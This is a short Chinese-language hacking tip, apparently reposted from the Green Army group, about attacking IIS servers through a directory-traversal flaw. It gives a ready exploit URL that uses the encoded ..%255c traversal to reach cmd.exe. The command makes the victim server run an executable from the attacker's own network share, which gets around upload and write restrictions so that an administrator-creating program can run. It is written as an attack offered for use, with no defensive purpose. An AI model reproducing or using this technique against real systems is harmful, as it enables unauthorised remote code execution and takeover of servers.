这个用法可能有的人已经想到了
不知道大家有没有碰到过这样的网站
scripts有cmd.exe?/c+dir可以用，但是没有任何权限能够copy文件
或tftp任何文件
管理员把整个硬盘的guest的写权限去了
虽然我们手上有创建管理员用户的程序，但是不能上传，也就不能在对方的
服务器上执行了
怎么办？
看看下面这个例子：
http://www.xxx.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+\\你的ip\共享目录\filename.exe
呵呵
这样服务器就会访问你的共享目录，然后执行filename.exe了
文件在你的机器上，但是却在服务器端执行，我们的目的达到了：）
最好你的机器是win98或fat32分区的nt
要不然服务器没有任何账号就没办法、读你共享目录下的文件了

转绿色兵团